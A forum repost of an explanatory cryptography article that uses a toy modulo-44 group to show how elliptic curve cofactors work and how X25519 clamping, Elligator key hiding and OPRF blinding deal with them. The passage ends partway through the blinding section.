Everything posted by Nytro

  1. April 2020

Cofactor Explained: Clearing Elliptic Curves' dirty little secret

Much of public key cryptography uses the notion of prime-order groups. We first relied on the difficulty of the Discrete Logarithm Problem. Problem was, Index Calculus makes DLP less difficult than it first seems. So we used longer and longer keys – up to 4096 bits (512 bytes) in 2020 – to keep up with increasingly efficient attacks.

Elliptic curves solved that. A well chosen, safe curve can only be broken by brute force. In practice, elliptic curve keys can be as small as 32 bytes. On the other hand, elliptic curves were not exactly fast, and the maths involved many edge cases and subtle death traps. Most of those problems were addressed by Edwards curves, which have a complete addition law with no edge cases, and Montgomery curves, with a simple and fast scalar multiplication method. Those last curves however did introduce a tiny little problem: their order is not prime.

(Before we dive in, be advised: this is a dense article. Don't hesitate to take the time you need to digest what you've just read and develop an intuitive understanding. Prior experience with elliptic curve scalar multiplication helps too.)

Prime-order groups primer

First things first: what's so great about prime-order groups? What's a group anyway? What does "order" even mean?

A group is the combination of a set of elements "G" and an operation "+". The operation follows what we call the group laws:

  • For all a and b in G, a+b is also in G (closure).
  • For all a, b, and c in G, (a+b)+c = a+(b+c) (associativity).
  • There's an element "0" such that for all a, 0+a = a+0 = a (identity element).
  • For all a in G, there's an element -a such that a + -a = 0 (inverse element).

Basically what you'd expect from good old addition. The order of a group is simply the number of elements in that group. To give you an example, let's take G = [0..15], and define + as binary exclusive or. All laws above can be checked.
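The XOR group above is small enough to verify mechanically. This sketch (plain Python, nothing assumed beyond the text) checks all four group laws for G = [0..15] with XOR as the operation:

```python
# G = {0..15} with XOR as the group operation.
G = range(16)

# Closure: a ^ b stays in G.
assert all((a ^ b) in G for a in G for b in G)

# Associativity: (a ^ b) ^ c == a ^ (b ^ c).
assert all(((a ^ b) ^ c) == (a ^ (b ^ c)) for a in G for b in G for c in G)

# Identity: 0 ^ a == a ^ 0 == a.
assert all((0 ^ a) == a == (a ^ 0) for a in G)

# Inverse: each element is its own inverse (a ^ a == 0).
assert all((a ^ a) == 0 for a in G)

print("all group laws hold; order =", len(G))
```

The identity and inverse checks together show the "weird property" mentioned below: every element is its own inverse.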
Its order is 16 (there are 16 elements). Note some weird properties. For instance, each element is its own inverse (a xor a is zero).

More interesting are cyclic groups, which have a generator: an element that repeatedly added to itself can walk through the entire group (and back to itself, so it can repeat the cycle all over again). Cyclic groups are all isomorphic to the group of non-negative integers under addition modulo the same order. Let's take for instance [0..9], with addition modulo 10. The number 1 is a generator of the group:

1 = 1
2 = 1+1
3 = 1+1+1
4 = 1+1+1+1
5 = 1+1+1+1+1
6 = 1+1+1+1+1+1
7 = 1+1+1+1+1+1+1
8 = 1+1+1+1+1+1+1+1
9 = 1+1+1+1+1+1+1+1+1
0 = 1+1+1+1+1+1+1+1+1+1
1 = 1+1+1+1+1+1+1+1+1+1+1 (next cycle starts)
2 = 1+1+1+1+1+1+1+1+1+1+1+1
etc.

Not all numbers are generators of the entire group. 5 for instance can generate only 2 elements: 0, and itself.

5 = 5
0 = 5+5
5 = 5+5+5 (next cycle starts)
0 = 5+5+5+5
etc.

Note: we also use the word "order" to speak of how many elements are generated by a given element. In the group [0..9], 5 "has order 2", because it can generate 2 elements. 1, 3, 7, and 9 have order 10. 2, 4, 6, and 8 have order 5. 0 has order 1.

Finally, prime-order groups are groups with a prime number of elements. They are all cyclic. What's great about them is their uniform structure: every element (except zero) can generate the whole group. Take for instance the group [0..10] (which has order 11). Every element except 0 is a generator:

(Note: from now on, I will use the notation A.4 to denote A+A+A+A. This is called "scalar multiplication" (in this example, the group element is A and the scalar is 4). Since addition is associative, various tricks can speed up this scalar multiplication. I use a dot instead of "×" so we don't confuse it with ordinary multiplication, and to remind us that the group element on the left of the dot is not necessarily a number.)
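The element orders quoted above are easy to compute by brute force. Here is a small helper of my own (not from the article) that keeps adding a to itself until it cycles back to 0:

```python
def element_order(a, n):
    """Order of a in the additive group of integers modulo n:
    the smallest k >= 1 such that k*a ≡ 0 (mod n)."""
    acc, k = a % n, 1
    while acc != 0:
        acc = (acc + a) % n
        k += 1
    return k

# Matches the text: in [0..9], 5 has order 2; 1, 3, 7, 9 have order 10;
# 2, 4, 6, 8 have order 5; and 0 has order 1.
assert element_order(5, 10) == 2
assert all(element_order(g, 10) == 10 for g in (1, 3, 7, 9))
assert all(element_order(g, 10) == 5 for g in (2, 4, 6, 8))
assert element_order(0, 10) == 1
```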
1.1 = 1     2.1 = 2     3.1 = 3     4.1 = 4
1.2 = 2     2.2 = 4     3.2 = 6     4.2 = 8
1.3 = 3     2.3 = 6     3.3 = 9     4.3 = 1
1.4 = 4     2.4 = 8     3.4 = 1     4.4 = 5
1.5 = 5     2.5 = 10    3.5 = 4     4.5 = 9
1.6 = 6     2.6 = 1     3.6 = 7     4.6 = 2
1.7 = 7     2.7 = 3     3.7 = 10    4.7 = 6
1.8 = 8     2.8 = 5     3.8 = 2     4.8 = 10
1.9 = 9     2.9 = 7     3.9 = 5     4.9 = 3
1.10 = 10   2.10 = 9    3.10 = 8    4.10 = 7
1.11 = 0    2.11 = 0    3.11 = 0    4.11 = 0
etc.

You get the idea. In practice, we can't distinguish group elements from each other: apart from zero, they all have the same properties. That's why discrete logarithm is so difficult: there is no structure to latch on to, so an attacker would mostly have to resort to brute force. (Okay, I lied. Natural numbers do have some structure to latch on to, which is why RSA keys need to be so damn huge. Elliptic curves – besides treacherous exceptions – don't have a known exploitable structure.)

The cofactor

So what we want is a group of order P, where P is a big honking prime. Unfortunately, the simplest and most efficient elliptic curves out there – those that can be expressed in Montgomery and Edwards form – don't give us that. Instead, they have order P×H, where P is suitably large, and H is a small number (often 4 or 8): the cofactor.

Let's illustrate this with the cyclic group [0..43], of order 44. How much structure can we latch on to?

0  1  2  3
4  5  6  7
8  9  10 11
12 13 14 15
16 17 18 19
20 21 22 23
24 25 26 27
28 29 30 31
32 33 34 35
36 37 38 39
40 41 42 43

Since 44 is not prime, not all elements will have order 44. For instance:

1 has order 44
2 has order 22
3 has order 44
4 has order 11
…

You get the idea. When we go over all numbers, we notice that the order of each element is not arbitrary. It is either 1, 2, 4, 11, 22, or 44. Note that 44 = 11 × 2 × 2. We can see where the various orders come from: 1, 2, 2×2, 11, 11×2, 11×2×2. The order of an element is easy to test: just multiply by the order to test, and see if it yields zero.
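The claim that every order in [0..43] is one of 1, 2, 4, 11, 22, or 44 can be confirmed exhaustively. A quick sketch (reusing the brute-force order function idea, which is my own helper, not the article's):

```python
def element_order(a, n):
    """Smallest k >= 1 with k*a ≡ 0 (mod n)."""
    acc, k = a % n, 1
    while acc != 0:
        acc = (acc + a) % n
        k += 1
    return k

orders = {element_order(a, 44) for a in range(44)}
# Every order is a divisor of 44 = 11 × 2 × 2:
assert orders == {1, 2, 4, 11, 22, 44}

# Spot checks from the text:
assert element_order(1, 44) == 44
assert element_order(2, 44) == 22
assert element_order(4, 44) == 11
```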
For instance (remember A.4 is shorthand for A+A+A+A, and we're working modulo 44 – the order of the group):

8 . 11 = 0   -- prime order
24 . 11 = 0  -- prime order
25 . 11 = 11 -- not prime order
11 . 4 = 0   -- low order
33 . 4 = 0   -- low order
25 . 4 = 12  -- not low order

("Low order" means orders below 11: 1, 2, 4. Not much lower than 11, but if we replace 11 by a large prime P, the term "low order" makes more sense.)

Understandably, there are only a few elements of low order: 0, 11, 22, and 33. 0 has order 1, 22 has order 2, 11 and 33 have order 4. Like the column on the left, they form a proper subgroup. It's easier to see by swapping and rotating the columns a bit:

0  11 22 33
4  15 26 37
8  19 30 41
12 23 34 1
16 27 38 5
20 31 42 9
24 35 2  13
28 39 6  17
32 43 10 21
36 3  14 25
40 7  18 29

The low order subgroup is shown on the first line. And now we can finally see the structure of this group: a narrow rectangle, with 11 lines and 4 columns, where each element in this rectangle is the sum of an element of prime order and an element of low order. For instance:

30 = 8 + 22  = 4.2 + 11.2
35 = 24 + 11 = 4.6 + 11.1
1 = 12 + 33  = 4.3 + 11.3

You just have to look left and up to know which elements to sum. To do this algebraically, you need to multiply by the right scalar. You need to clear the (co)factor.

Let's first look left. How do we clear the cofactor? We start with an element that can be expressed thus:

E = 4.a + 11.b

What we want to find is the scalar s such that E.s = 4.a. Note that:

E.s = (4.a + 11.b).s
E.s = 4.a.s + 11.b.s
E.s = 4.(a×s) + 11.(b×s)
E.s = 4.(a×1) + 11.(b×0)

Recall that 4 has order 11, and 11 has order 4. So s must follow these equations:

s = 1 mod 11 -- preserve a
s = 0 mod 4  -- absorb b

There's only one such scalar between 0 and 44: 12. So multiplying by 12 clears the cofactor and preserves the prime factor. For instance:

13.12 = 24
27.12 = 16
42.12 = 20

Now we know how to look left.
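That 12 is the only scalar satisfying both congruences, and that it really does "look left", can be checked directly. A sketch in plain Python over the toy group:

```python
# The unique scalar in [0..43] with s ≡ 1 (mod 11) and s ≡ 0 (mod 4):
candidates = [s for s in range(44) if s % 11 == 1 and s % 4 == 0]
assert candidates == [12]

# Multiplying by 12 "looks left": the result always lands in the
# prime-order subgroup (the multiples of 4)...
assert all(((e * 12) % 44) % 4 == 0 for e in range(44))

# ...and it matches the worked examples from the text.
assert (13 * 12) % 44 == 24
assert (27 * 12) % 44 == 16
assert (42 * 12) % 44 == 20
```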
To look up, we follow the same reasoning, except this time our scalar s must follow these equations:

s = 0 mod 11 -- absorb a
s = 1 mod 4  -- preserve b

That's 33. For instance:

13.33 = 33
27.33 = 11
42.33 = 22

Now we can look up as well.

(Note: This "looking up" and "looking left" terminology isn't established mathematical terminology, but rather a hopefully helpful illustration. Do not ask established mathematicians or cryptographers about "looking up" and "looking left" without expecting them to be at least somewhat confused.)

Torsion safe representatives

We now have an easy way to project elements onto the prime-order subgroup. Just look left by multiplying the element by the appropriate scalar (in the case of our [0..43] group, that's 12). That lets us treat each line of the rectangle as an equivalence class, with one canonical representative: the leftmost element – the one that is on the prime-order subgroup. This effectively gets us what we want: a prime-order group.

Let's say we have a scalar s and an element E, which are not guaranteed to be on the prime-order subgroup. We want to know in which line their scalar multiplication will land, and we want to represent that line by its leftmost element. To do so, we just need to perform the scalar multiplication, then look left. For instance:

s = 7  -- some random scalar
E = 31 -- some random point
E.s = 41
result = (E.s).12 = 8

Or we could first project E to the left, then perform the scalar multiplication. It will stay on the left column, and give us the same result:

E = 31
E . 12 = 20
result = (E.12).s = 8

The problem with this approach is that it is slow. We're performing two scalar multiplications instead of just one. That kind of defeats the purpose of choosing a fast curve to begin with. We need something better. Let us look at our result one more time:

result = (E.s).12 = 8
result = (E.12).s = 8

It would seem the order in which we do the scalar multiplications does not matter.
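Looking left and looking up are complementary projections: every element of the toy group decomposes into its prime-order part plus its low-order part. A short check of my own over all 44 elements:

```python
LEFT, UP = 12, 33  # look left (clear cofactor) / look up (clear prime factor)

for e in range(44):
    left = (e * LEFT) % 44   # prime-order component
    up = (e * UP) % 44       # low-order component
    assert left % 4 == 0          # lands in the left column
    assert (up * 4) % 44 == 0     # has order dividing 4
    assert (left + up) % 44 == e  # the two components sum back to e

# The "looking up" examples from the text:
assert (13 * 33) % 44 == 33
assert (27 * 33) % 44 == 11
assert (42 * 33) % 44 == 22
```

The final assertion of the loop works because 12 + 33 = 45 ≡ 1 (mod 44), so the two projections always recombine into the original element.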
Indeed, the associativity of group addition means we can rely on the following:

(E.s).t = E.(s×t) = E.(t×s) = (E.t).s

Now you can see that we can avoid performing two scalar multiplications, and multiply the two scalars instead. To go back to our example:

s = 7  -- our random scalar
E = 31 -- our random point
result = E.(7×12) -- scalarmult and look left
result = E.(84)
result = E.(40)   -- because 84 % 44 = 40
result = 8

Remember we are working with a cyclic group of order 44: adding an element to itself 84 times is like adding it to itself 44 times (the result is zero), and again 40 times. So better reduce the scalar modulo the group order so we can have a cheaper scalar multiplication. Let's recap:

s = 7  -- our random scalar
E = 31 -- our random point
E.s = 41
E.(s×12) = 8

41 and 8 are on the same line, and 8 is in the prime-order subgroup. Multiplying by s×12 instead of s preserved the main factor, and cleared the cofactor. Because of this, we call s×12 the torsion safe representative of s.

Now computing (s×12) % 44 may be simple, but it doesn't look very cheap. Thankfully, we're not out of performance tricks:

(s×12) % 44
= (s×(11+1)) % 44
= (s + (s × 11)) % 44
= s + (s × 11) % 44 -- we assume s < 11
= s + (s%4 × 11)    -- we can remove the %44

We only need to add s and a multiple of 11 (0, 11, 2×11, or 3×11). The result is guaranteed to be under the group order (44). The total cost is: multiplying the prime order by a small number, and adding two scalars together. Compared to the scalar multiplication, that's practically free.

Decoupling main factor and cofactor

We just found the torsion safe representative of a scalar, which after scalar multiplication preserves the line, and only chooses the left column. In some cases, we may want to reverse roles: preserve the column, and only choose the top line. In other words, we want to do the equivalent of performing the scalar multiplication, then looking up.
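The torsion-safe-representative shortcut above can be checked exhaustively in the toy group. This sketch (mine, assuming scalars are already reduced modulo the prime order 11, as the trick requires) confirms that the cheap formula matches both the full modular multiplication and the "scalarmult then look left" path:

```python
def torsion_safe(s):
    """Cheap equivalent of (s * 12) % 44, assuming s < 11."""
    return s + (s % 4) * 11

for s in range(11):          # scalars reduced modulo the prime order
    assert torsion_safe(s) == (s * 12) % 44
    for E in range(44):
        # Multiplying by the representative == scalarmult, then look left.
        assert (E * torsion_safe(s)) % 44 == ((E * s) % 44 * 12) % 44

# The worked example: s = 7, E = 31.
assert (31 * 7) % 44 == 41                 # normal result
assert torsion_safe(7) == 40               # 7 × 12 = 84 ≡ 40 (mod 44)
assert (31 * torsion_safe(7)) % 44 == 8    # projected result
```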
The reasoning is the same as for torsion safe representatives, only flipped on its head. Instead of multiplying our scalar by 12 (a multiple of the low order, equal to 1 modulo the prime order), we want to multiply it by 33: a multiple of the prime order, equal to 1 modulo the low order. Again, modular multiplication by 33 is not cheap, so we repeat our performance trick:

(s×33) % 44
= (s×11×3) % (11×4)
= ((s×3) % 4) × 11

In this case, we just have to compute (s×3) % 4 and multiply the prime order by that small number. The total cost is just the multiplication of the order by a very small number. Now we can do the decoupling:

s = 7  -- some random scalar
E = 31 -- some random point
E.s = 41            -- normal result
E.(s×12) = 8
E.(s×33) = 33
E.s = 8 + 33 = 41   -- decoupled result

Cofactor and discrete logarithm

Time to start applying our knowledge. Let's say I have elements A and B, and a scalar s such that B = A.s. The discrete logarithm problem is about finding s when you already know A and B. If we're working in a prime-order group with a sufficiently big prime, that problem is intractable. But we're not working with a prime-order group. We have a cofactor to deal with. Let's go back to our group of order 44:

0  11 22 33
4  15 26 37
8  19 30 41
12 23 34 1
16 27 38 5
20 31 42 9
24 35 2  13
28 39 6  17
32 43 10 21
36 3  14 25
40 7  18 29

We can easily recover the line and the column of A and B, so let's do that. Take for instance A = 27 and B = 15. Now let's find s.

A = 27
A = 16 + 11
A = 4.4 + 11.1

B = 15
B = 4 + 11
B = 4.1 + 11.1

B = A . s
4.1 + 11.1 = (4.4 + 11.1) . s
4.1 + 11.1 = (4.4).s + (11.1).s
4 .1 = (4 .4).s
11.1 = (11.1).s

Now look at that last line. Since 11 has only order 4, there are only 4 possible solutions, which are easy to brute force. We can try them all and easily see that:

11 . 1 = (11.1).1 (mod 44)
s mod 4 = 1

The other equation however is more of a problem. There are 11 possible solutions, and trying them all is more expensive:

4 . 1 ≠ (4.4).1
4 . 1 ≠ (4.4).2
4 . 1 = (4.4).3
s mod 11 = 3

Now that we know both moduli, we can deduce that s = 25:

A . s = B
27.25 = 15

What we just did here is reduce the discrete logarithm into two easier discrete logarithms. Such divide and conquer is the reason why we want prime-order groups, where the difficulty of the discrete logarithm is the square root of the prime order (square root because there are cleverer brute force methods than just trying all possibilities). Here however, the difficulty wasn't the square root of 44. It was sqrt(11) + sqrt(2) + sqrt(2), which is significantly lower.

The elliptic curves we are interested in however have much bigger orders. Curve25519 for instance has order 8 × L, where L is 2²⁵² + something (and the cofactor is 8). So the difficulty of solving discrete logarithm for Curve25519 is sqrt(2)×3 + sqrt(2²⁵²), or approximately 2¹²⁶. Still lower than sqrt(8×L) (about 2¹²⁷), but not low enough to be worrying: discrete logarithm is still intractable.

Cofactor and X25519

Elliptic curves can have a small cofactor and still guarantee we can't solve discrete logarithm. There's still a problem however: the attacker can still solve the easy half of discrete logarithm, and deduce the value of s modulo the cofactor. In the case of Curve25519, that means 3 bits of information that could be read, or even controlled, by the attacker. That's not ideal, so DJB rolled two tricks up his sleeve:

  • The chosen base point of the curve has order L, not 8×L. Multiplying that point by our secret scalar can then only generate points on the prime-order subgroup (the leftmost column). The three bits of information the attacker could have had are just absorbed by that base point.
  • The scalar is clamped. Bit 255 is cleared and bit 254 is set to prevent timing leaks in poor implementations, and to put a lower bound on standard attacks. More importantly, bits 0, 1, and 2 are cleared, to make sure the scalar is a multiple of 8.
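The divide-and-conquer attack above can be sketched end to end in the toy group. This is my own rendering (projecting onto each subgroup by multiplying by 11 and by 4, then recombining with the Chinese Remainder Theorem), not code from the article:

```python
# Recover s from A = 27, B = 15 with B = A·s (mod 44), by splitting the
# discrete log across the subgroups of order 4 and order 11.
A, B = 27, 15

# Low-order half: multiplying by 11 kills the prime-order component,
# so only s mod 4 matters (at most 4 tries).
s4 = next(k for k in range(4) if (11 * A * k) % 44 == (11 * B) % 44)

# Prime-order half: multiplying by 4 kills the low-order component,
# so only s mod 11 matters (at most 11 tries).
s11 = next(k for k in range(11) if (4 * A * k) % 44 == (4 * B) % 44)

# Recombine the two halves (Chinese Remainder Theorem, brute forced).
s = next(k for k in range(44) if k % 4 == s4 and k % 11 == s11)

assert (s4, s11, s) == (1, 3, 25)
assert (A * s) % 44 == B
```

Instead of up to 44 guesses, the attacker makes at most 4 + 11, which is the whole point of the divide and conquer.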
This guarantees that the low order component of the point, if any, will be absorbed by the scalar multiplication, such that the resulting point will be on the prime-order subgroup.

The second trick is especially important: it guarantees that the scalar multiplication between your secret key and an attacker-controlled point on the curve can only yield two kinds of results:

  • A point on the curve that has prime order. The attacker doesn't learn anything about your private key (at least not without solving discrete logarithm first), and they can't control which point on the curve you are computing. We're good.
  • Zero. Okay, the attacker did manage to force this output, but this only (and always) happens when they gave you a low order point. So again, they learned nothing about your private key. And if you need to check for low order output (some protocols, like CPace, require this check), you only need to make sure it's not zero (use a constant-time comparison, please).

(I'm ignoring what happens if the point you're multiplying is not on the curve. Failing to account for that has broken systems in the past. X25519 however only transmits the x-coordinate of the point, so the worst you can have is a point on the "twist". Since the twist of Curve25519 also has a big prime order (2²⁵³ minus something) and a small cofactor (4), the results will be similar, and the attacker will learn nothing. Curve25519 is thus "twist secure".)

Cofactor and Elligator

Elligator was developed to help with censorship circumvention. It encodes points on the curve so that if the point is selected at random, its encoding will be indistinguishable from random. With that tool, the entire cryptographic communication is fully random, including initial ephemeral keys. This enables the construction of fully random formats, and facilitates steganography. Communication protocols often require ephemeral keys to initiate communications.
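The constant-time zero check mentioned above can be done with Python's standard library. A sketch, assuming the X25519 output is a 32-byte string (the function name is my own; `hmac.compare_digest` is the stdlib's constant-time comparison):

```python
import hmac

def is_all_zero(shared_secret: bytes) -> bool:
    """Check whether a 32-byte X25519 output is the all-zero encoding.
    hmac.compare_digest compares in constant time, so the check does
    not leak how many leading bytes matched."""
    return hmac.compare_digest(shared_secret, bytes(32))

assert is_all_zero(bytes(32))
assert not is_all_zero(b"\x01" + bytes(31))
```

A naive `shared_secret == bytes(32)` may short-circuit on the first mismatching byte, which is exactly the kind of timing signal the parenthetical warns against.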
In practice, they need to generate a random key pair and send the public half over the network. Public keys however will not necessarily look random, even though the private half was indeed random. Curve25519 for instance has a number of biases:

  • Curve25519 points are encoded in 255 bits (we only encode the x-coordinate). Since all communication happens at the byte level, there is one unused bit, which is usually cleared. This is easily remedied by simply randomising the unused bit.
  • The x-coordinate of Curve25519 points does not span all values from 0 to 2²⁵⁵-1. Values 2²⁵⁵-19 and above never occur. In practice though, this bias is small enough to be utterly undetectable.
  • Curve25519 points satisfy the equation y² = x³ + 486662x² + x. All the attacker has to do is take the suspected x-coordinate, compute the right hand side of the equation, and check whether it is a square in the finite field GF(2²⁵⁵-19). For random strings, it will be about half the time. If it is a Curve25519 x-coordinate, it will be all the time. The remedy is Elligator mappings, which can decode all numbers from 0 to 2²⁵⁵-20 into a point on the curve. Encoding fails about half the time, but we can keep generating key pairs until we find one that can be turned into a random looking encoding.
  • X25519 keys aren't selected at random to begin with: because of cofactor clearing, they are taken from the prime-order subgroup. Even with Elligator mappings, an attacker can decode the point and check whether it belongs to the prime-order subgroup. With X25519, this would happen all the time, unlike with random representatives.

When I first discovered this problem, I didn't know what to do. The remedy is fairly simple once I understood the cofactor. The real problem was reaching that understanding. So, our problem is to generate a key pair where the public half is a random point on the whole curve, not just the prime-order subgroup.
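The third bias (the "is it a square?" distinguisher) is easy to demonstrate with big-integer arithmetic. A sketch of my own using Euler's criterion, which says a nonzero v is a square mod p exactly when v^((p-1)/2) ≡ 1 (mod p):

```python
import random

# Distinguisher: is x³ + 486662·x² + x a square in GF(2^255 - 19)?
p = 2**255 - 19

def looks_like_curve25519_x(x):
    v = (x**3 + 486662 * x**2 + x) % p
    # Euler's criterion (0 counts as a square).
    return v == 0 or pow(v, (p - 1) // 2, p) == 1

# The standard base point x = 9 is on the curve, so it always passes:
assert looks_like_curve25519_x(9)

# Uniformly random field elements pass only about half the time:
random.seed(1)
hits = sum(looks_like_curve25519_x(random.randrange(p)) for _ in range(200))
assert 60 < hits < 140  # roughly one half of 200
```

Real Curve25519 x-coordinates pass 100% of the time, so a censor watching enough "random" 32-byte strings can detect unmapped public keys statistically.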
Let's again illustrate it with the [0..43] group:

0  11 22 33
4  15 26 37
8  19 30 41
12 23 34 1
16 27 38 5
20 31 42 9
24 35 2  13
28 39 6  17
32 43 10 21
36 3  14 25
40 7  18 29

Recall that the prime-order subgroup is the column on the left, and the low order subgroup is the first line. X25519 is designed in such a way that:

  • The chosen generator of the curve has prime order.
  • The private key is a multiple of the cofactor.

For us here, this means our generator is 4, and our private key is a multiple of 4. You can check that multiplying 4 by a multiple of 4 will always yield a multiple of… 4. An element on the left column. (Remember, we're working modulo 44.) But that's no good. I want to select a random element on the whole rectangle, not just the left column.

If we recall our cofactor lessons, the solution is simple: add a random low order element. The random prime-order element selects the line, and the random low order element selects the column. Adding them together gives us a random element over the whole group. To add icing on the cake, this method is compatible with X25519. Let's take an example. Let's first have a regular key exchange:

B = 4   -- Generator of the prime-order group
sa = 20 -- Alice's private key
sb = 28 -- Bob's private key
SA = B.sa = 4.20 = 36   -- Alice's public key
SB = B.sb = 4.28 = 24   -- Bob's public key
ssa = SB.sa = 24.20 = 40 -- Shared secret (computed by Alice)
ssb = SA.sb = 36.28 = 40 -- Shared secret (computed by Bob)

As expected of Diffie–Hellman, Alice and Bob compute the same shared secret. Now, what happens if Alice adds a low order element to properly hide her key? Let's say she adds 11 (an element of order 4).

LO = 11            -- random low order point
HA = SA+LO = 36+11 = 3 -- Alice's "hidden" key
ssb = HA.sb = 3.28 = 40

Bob still computes the same shared secret! Which by now should not be a big surprise: scalars that are a multiple of the cofactor absorb the low order component, effectively projecting the result back onto the prime-order subgroup.
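The whole toy exchange, including the hidden key, runs as plain modular arithmetic. A sketch reproducing the numbers above:

```python
M = 44      # toy group: integers modulo 44
B = 4       # generator of the prime-order subgroup (order 11)

sa, sb = 20, 28          # private keys, multiples of the cofactor 4
SA = (B * sa) % M        # Alice's public key
SB = (B * sb) % M        # Bob's public key
assert (SA, SB) == (36, 24)

# Regular Diffie–Hellman: both sides agree.
assert (SB * sa) % M == (SA * sb) % M == 40

# Alice hides her public key by adding a low-order element (order 4):
LO = 11
HA = (SA + LO) % M
assert HA == 3           # no longer in the prime-order subgroup

# Bob's clamped key (a multiple of 4) absorbs the low-order part:
assert (HA * sb) % M == 40
```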
Applying this to Curve25519 is straightforward:

  • Select a random number, then clamp it as usual. It is now a multiple of the cofactor of the curve (8).
  • Multiply the Curve25519 base point by that scalar.
  • Add a low order point at random.

There's a little complication, though. X25519 works on Montgomery curves, which are optimised for an x-coordinate-only ladder. That ladder takes advantage of differential addition. Adding a low order point requires arbitrary addition, whose code is neither trivial nor readily available. We can work around that problem by starting from Edwards25519 instead:

  • Select a random number, then clamp it as usual. It is now a multiple of the cofactor of the curve (8).
  • Multiply the Edwards25519 base point by that scalar.
  • Add a low order point at random. (By the way, be sure the selection of the low order point happens in constant time. Avoid naive array lookup tables.)
  • Convert the result to Curve25519 (clamping guarantees we do not hit the treacherous exceptions of the birational map).

The main advantage here is speed: Edwards25519 scalar multiplication by the base point often takes advantage of pre-computed tables, making it much faster than the Montgomery ladder in practice. (Note: pre-computed tables don't really apply to key exchange, which is why X25519 uses the Montgomery ladder instead.) This has a price however: we now depend on EdDSA code, which is not ideal if we don't compute signatures as well. Moreover, some libraries, like TweetNaCl, avoid pre-computed tables to simplify the code. This makes Edwards scalar multiplication slower than the Montgomery ladder.

Alternatively, there is a way to stay in Montgomery space: change the base point. Let's try it with the [0..43] group. Instead of using 4 as the base point, we'll add 11, a point whose order is the same as the cofactor (4). Our "dirty" base point is 15 (4+11).
Now let's multiply that by Alice's private key:

LO = 11 -- low order point (order 4)
B = 4   -- base point (prime order)
D = B+LO = 4+11 = 15 -- "dirty" base point
sa = 20              -- Alice's private key
SA = B.sa = 4.20 = 36  -- Alice's public key
HA = D.sa = 15.20 = 36 -- ???

Okay, we have a problem: even with the dirty base point, we get the same result. That's because Alice's private key is still a multiple of the cofactor, and absorbs the low order component. But we don't want to absorb it, we want to use it, to select a column at random. Here's the trick:

  • Use a multiple of the cofactor (4) to select the line.
  • Use a multiple of the prime order (11) to select the column.
  • Add those two numbers.
  • Multiply the dirty base point by the result.

Note the parallel with EdDSA: we were adding points, now we add scalars. But the result is the same:

d = 33                -- random multiple of the prime order
da = sa+d = 20+33 = 9 -- Alice's "dirty" secret key (modulo 44)
HA = D.da = 15.9 = 3  -- Alice's hidden key

Note that we can ensure both methods yield the same results by properly decoupling the main factor and the cofactor. Now we can apply the method to Curve25519:

  • Add a low order point of order 8 to the base point. That's our new, "dirty" base point. This can be done offline, and the result hard coded. (I personally added the Edwards25519 base point to a low order Edwards point, then converted the result to Montgomery.)
  • Select a random number, then clamp it as usual. It is now a multiple of the cofactor of the curve (8). Note that if we multiplied the dirty base point by that scalar alone, we'd absorb the low order point all over again.
  • Select a random multiple of the prime order. For Curve25519, that means 0, L, 2L… up to 7L.
  • Add that multiple of L to the clamped random number above.
  • Multiply the resulting scalar by the dirty base point.

That way we no longer need EdDSA code. (Note: you can look at actual code in the implementation of the crypto_x25519_dirty_*() functions in my Monocypher cryptographic library.)
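The dirty base point trick, again in toy form. This sketch of mine reproduces both the failed attempt (clamped key absorbs the low-order part) and the fix (add a multiple of the prime order to the scalar):

```python
M = 44
B, LO = 4, 11            # base point (order 11) and low-order point (order 4)
D = (B + LO) % M         # "dirty" base point: 15

sa = 20                  # clamped secret: a multiple of the cofactor 4
# Failed attempt: the clamped key absorbs the low-order component.
assert (D * sa) % M == (B * sa) % M == 36

# The fix: add a multiple of the prime order (11) to the scalar.
d = 33
da = (sa + d) % M        # "dirty" secret key: 9
HA = (D * da) % M
assert HA == 3           # same line as 36, different column

# Looking left (×12) recovers the normal public key...
assert (HA * 12) % M == 36
# ...and key exchange with a clamped peer key still works:
sb = 28
assert (HA * sb) % M == ((B * sa) % M * sb) % M == 40
```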
Cofactor and scalar inversion

Scalar inversion is useful for exponential blinding, to implement Oblivious Pseudo-Random Functions (OPRF). (It will make sense soon, promise.)

Let's say Alice wants to connect to Bob's server with her password. To maximise security, they use the latest and greatest in authentication technology (augmented PAKE). One important difference between that and your run-of-the-mill password based authentication is that Alice doesn't want to transmit her password. And Bob certainly doesn't want to transmit the salt to anyone but Alice; that would be the moral equivalent of publishing his password database. Yet we must somehow end up with Alice knowing something she can use as the salt: a blind salt, which must be a function of the password and the salt only:

Blind_salt = f(password, salt)

One way to do this is with exponential blinding. We start by having Alice compute a random point on the curve, which is a function of the password:

P = Hash_to_point(Hash(password))

That will act as a kind of secret, hidden base point. The Hash_to_point() function can use the Elligator mappings. Note that even though P is the base point multiplied by some scalar, we cannot recover the value of that scalar (if we could, it would mean Elligator mappings could be used to solve discrete logarithm). Now Alice computes an ephemeral key pair with that base point:

r = random()
R = P . r

She sends R to Bob. Note that as far as Bob (or any attacker) is concerned, that point R is completely random, and has no correlation with the password or its hash. The difficulty of discrete logarithm prevents them from recovering P from R alone. Now Bob uses R to transmit the blind salt:

S = R . salt

He sends S back to Alice, who then computes the blind salt:

Blind_salt = S . (1/r) -- assuming r × (1/r) = 1

Let's go over the whole protocol:

P = Hash_to_point(Hash(password))
r = random()
R = P . r
S = R . salt
Blind_salt = S . (1/r)
Blind_salt = R . salt . (1/r)
Blind_salt = P . r . salt . (1/r)
Blind_salt = P . (r × salt × (1/r))
Blind_salt = P . salt
Blind_salt = Hash_to_point(Hash(password)) . salt

And voilà, our blind salt depends solely on the password and the salt. You need to know the password to compute it from the salt, and if Mallory tries to connect to Bob, guessing the wrong password will give her a totally different, unexploitable blind salt. Offline dictionary attack is not possible without having hacked the database first.

Now this is all very well if we are working on a prime-order subgroup. Scalars do have an inverse modulo the order of the curve, hash to point will give us what we want… except nope, our group does not have prime order. We need to deal with the cofactor, somehow.

The first problem with the cofactor comes from Hash_to_point(). When Elligator decodes a representative into a point on the curve, that point is not guaranteed to belong to the prime-order subgroup. There's the potential to leak up to 3 bits of information about the password (the cofactor of Curve25519 is 8). Fortunately, the point P is not transmitted over the network. Only R is. And this gives us the opportunity to clear the cofactor:

R = P . r

If the random scalar r is a multiple of 8, then R is guaranteed to be on the prime-order subgroup, and we won't leak anything. X25519 has us covered: after clamping, r is a multiple of 8.

This guarantee however goes out the window as soon as R is transmitted across the network: Mallory could instead send a bogus key that is not on the prime-order subgroup. (She could also send a point on the twist, but Curve25519 is twist secure, so let's ignore that.) Again though, X25519 takes care of this:

S = R . salt

